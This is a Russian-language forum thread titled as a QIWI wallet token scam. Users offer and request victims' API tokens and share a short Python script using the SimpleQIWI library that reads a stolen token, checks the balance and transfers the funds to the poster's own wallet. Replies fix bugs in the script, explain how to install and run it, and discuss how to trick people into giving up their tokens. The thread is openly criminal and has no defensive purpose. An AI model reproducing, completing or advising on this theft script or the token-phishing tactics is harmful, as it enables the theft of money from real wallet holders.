• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Скам киви по токену.

BlackTiger228

Новичок
Реакции
0
0 руб.
1)Кто поможет разобраться?
2)Готов найти человека узнать у него токен и скинуть вам(может больше чем 1). Найду быстро.
3)Только не новорег!!!
Токены = плата за обучение.

S1mplyDrugs

Новичок
Реакции
0
0 руб.
Создаем ещё файл, вставляем код,ребят помогите пожайлуста,до этого момента см"1 предложение до запятой"всё норм запустил токен свой же вставил,создал ещё один файл,ну окей создал,запустил он открылся и закрылся и чё к чему мб кто объяснить что я не так сделал.

glebkhil

Местный
Реакции
59
0 руб.
почему дальше этой строчки "print(api.balance)" (второй файл) код дальше не отрабатывает?

разобрался

Последнее редактирование:

glebkhil

Местный
Реакции
59
0 руб.
бро подкажи как раазобрался пожалуйста, та же самаая тема! отблагодарю токеном на 100Р
from SimpleQIWI import *

print('Q I W I Software 1.0 / coded by Mad_1337');
token=input('Enter token: ')
phone=input('Enter phone: ');
api = QApi(token=token, phone=phone)
print('Balance Founded')
print(api.balance)
api.pay(account="ваш фрукт киви", amount=сумма, comment='сорри бро что спиздил твои бабки')
print(api.balance)
input()

заполни такие места
"Ваш фрукт киви" - вместо напиши номер киви, на который будет слаться бабло
"сумма" - укажи сумму, которая будет сниматься

EverBack

Участник
Реакции
9
0 руб.
Telegram
Please note, if you want to make a deal with this user, that it is blocked.

Гомункyл

Местный
Реакции
236
0 руб.
Что это еще за "coded by Mad_1337" ???
Обязательно ли это вписывать? Я так понимаю, это создатель кода

Последнее редактирование:

DarkEldar

Новичок
Реакции
0
0 руб.
кто поможет у меня есть SimpleQiwi но не знаю как разобраться в нем и в Python могу для вас если поможете дать несколько токен( прямо сейчас нету у меня но могу найти в тот же момент)

Гомункyл

Местный
Реакции
236
0 руб.
Очень сложно как оказалось развести человека на токен. После получения токена пишут что "не кому не давайте токен во избежание взлома". Думаю мало кто клюнет, учитываю что при попытке в гугле ввести "киви токен" вылезает видео овера. Любой заинтересованный человек сразу спалит. Я не говорю что схема не работает, может кто нибудь конечно и поведется.

DarkEldar

Новичок
Реакции
0
0 руб.
здраствуйте. Можете мне помочь? У меня есть проблема когда я закачиваю Python 3.6.0 у меня скачивается 4 файла. python.PNG И я так скачал мой Python3.6.0 (может не ту версию скачал) python 3.6.0.PNG executable installer.PNG Ну и как вы увидели у меня нету файла "Scripts" У меня уже есть SimleQIWI.SimpleQIWI.PNG Просто надо разобраться в python-е. Если кто-то ответит буду очень благодарень!!!

SkillUP

Участник
Реакции
36
0 руб.
Пасаны, помогите, у меня cmd окна при запуске закрываются, не шарю, хелпаните по-братски

RVL

Профи
Реакции
2.221
0 руб.
Telegram
Please note, if you want to make a deal with this user, that it is blocked.
Вообщем я ебался с этим кодом всю ночь. Первый питон файл с кодом на чек баланса работает идеально. А вот второй питон файл мозг ебал. Нужно было изменять в коде не только номер Фрукт киви и сумму, но и примечание к платежу. Ибо оно не может быть написано на русском языке. Поменял примечание к платежу на английские буквы, файл запустился, и всё нормально перевёл.

glebkhil

Местный
Реакции
59
0 руб.
здраствуйте. Можете мне помочь? У меня есть проблема когда я закачиваю Python 3.6.0 у меня скачивается 4 файла. Посмотреть вложение 12324 И я так скачал мой Python3.6.0 (может не ту версию скачал) Посмотреть вложение 12325 Посмотреть вложение 12326 Ну и как вы увидели у меня нету файла "Scripts" У меня уже есть SimleQIWI.Посмотреть вложение 12327 Просто надо разобраться в python-е. Если кто-то ответит буду очень благодарень!!!
Scripts не файл а папка
Вообщем я ебался с этим кодом всю ночь. Первый питон файл с кодом на чек баланса работает идеально. А вот второй питон файл мозг ебал. Нужно было изменять в коде не только номер Фрукт киви и сумму, но и примечание к платежу. Ибо оно не может быть написано на русском языке. Поменял примечание к платежу на английские буквы, файл запустился, и всё нормально перевёл.
Можно добавить две строчки кода и тогда в программе можно в ручную писать сколько переводить и на какой номер

DarkEldar

Новичок
Реакции
0
0 руб.
Scripts не файл а папка

Можно добавить две строчки кода и тогда в программе можно в ручную писать сколько переводить и на какой номер
файл и папка тоже самоу можете скрины или видео скинуть пж не иогу разобраться

glebkhil

Местный
Реакции
59
0 руб.
файл и папка тоже самоу можете скрины или видео скинуть пж не иогу разобраться
установи питон, открой cmd там напиши "pip install SimpleQIWI" нажми enter . Дальше вводи текст из первого сообщения. Желательно второй текст, так как первый только проверяет баланс

NeonSign

Участник
Реакции
1
0 руб.
Telegram
Jabber
Те кто говорят "Если бы ещё дополнение было как узнать токен жертвы, было бы вообще супер." Вас учили по РУ не работать?

Сверху Снизу